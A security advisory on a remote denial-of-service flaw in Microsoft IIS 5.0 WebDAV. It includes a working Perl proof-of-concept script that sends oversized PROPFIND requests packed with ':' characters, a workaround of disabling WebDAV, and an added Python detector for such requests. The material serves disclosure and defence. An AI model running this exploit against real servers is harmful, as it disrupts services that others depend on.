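PROPFIND Request Can Cause Denial of Service in IIS 5.0
Published: 2001-05-12
Updated: 2001-05-12
Affected systems:
Microsoft IIS 5.0
Description:
A specially crafted request can remotely restart all IIS-related services. Sending such requests repeatedly will severely degrade IIS performance. The specially crafted request is a very long but valid PROPFIND request containing many ":" characters.
<* Source: Georgi Guninski (guninski@guninski.com) *>
Testing method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!
Georgi Guninski (guninski@guninski.com) provides the following demonstration program: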
--vv9.pl-------------------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
printf "Written by Georgi Guninski wait some time\n";
$port = @ARGV[1];
$host = @ARGV[0];
sub vv()
{
$ll=$_[0];
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
$over=":" x $ll ; # the ":" is the most important
$ch=pack("C",65); # just to check whether potential payload is possible - yes
$tmp = $ch x 64;
$over= $ch x 4 . $over . $tmp;
$over1=":" x $ll; #not sure about this
$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."$over1".':">';
$xml=$xml.'<a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
$l=length($xml);
$req="PROPFIND / HTTP/1\.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,200);
print $res;
close $socket;
}
do vv(59060);
#this is overflow, repeat several times - 49060 seems the smallest #, may need to change
sleep(1);
do vv(59060);
---------------------------------------------------------------------------
Recommendations:
Temporary workaround:
Disable the WebDAV extension.
Vendor patch:
None available yet.
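Where WebDAV has to stay enabled on some hosts, requests of the shape described above (a PROPFIND whose XML body carries a long run of ":" characters) can be flagged at a proxy or in captured traffic. The following is an added detection example, not part of the original advisory or the author's program; the thresholds, function names and sample requests are assumptions made for illustration.

```python
import re

# Assumed thresholds (not from the advisory): legitimate WebDAV clients use
# short namespace URIs and element names, so both limits are generous.
MAX_COLON_RUN = 64
MAX_BODY_BYTES = 16 * 1024
COLON_RUN = re.compile(rb":{%d,}" % MAX_COLON_RUN)


def inspect_request(raw):
    """Return the reasons a raw HTTP request resembles the malformed PROPFIND."""
    head, _, body = raw.replace(b"\r\n", b"\n").partition(b"\n\n")
    lines = head.split(b"\n")
    if lines[0].split(b" ", 1)[0].upper() != b"PROPFIND":
        return []  # only PROPFIND is in scope for this check
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    reasons = []
    # Trust whichever is larger: the declared length or the bytes actually seen.
    declared = headers.get(b"content-length", b"0")
    size = max(len(body), int(declared) if declared.isdigit() else 0)
    if size > MAX_BODY_BYTES:
        reasons.append("oversized PROPFIND body (%d bytes)" % size)
    run = COLON_RUN.search(body)
    if run:
        reasons.append("run of %d ':' characters in XML body" % len(run.group()))
    return reasons


def sample_request(method, body):
    # Constructed sample request; the host name is a placeholder.
    return (b"%s / HTTP/1.1\nHost: www.example.test\nContent-Type: text/xml\n"
            b"Content-Length: %d\n\n" % (method, len(body))) + body


# Constructed inputs: an ordinary PROPFIND and one with a long ":" namespace.
BENIGN = sample_request(b"PROPFIND", b'<?xml version="1.0"?><a:propfind xmlns:a="DAV:">'
                        b"<a:prop><a:displayname/></a:prop></a:propfind>")
SUSPECT = sample_request(b"PROPFIND", b'<?xml version="1.0"?><a:propfind xmlns:a="DAV:" '
                         b'xmlns:u="' + b":" * 2000 + b'"><a:prop/></a:propfind>')

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, inspect_request(req))
```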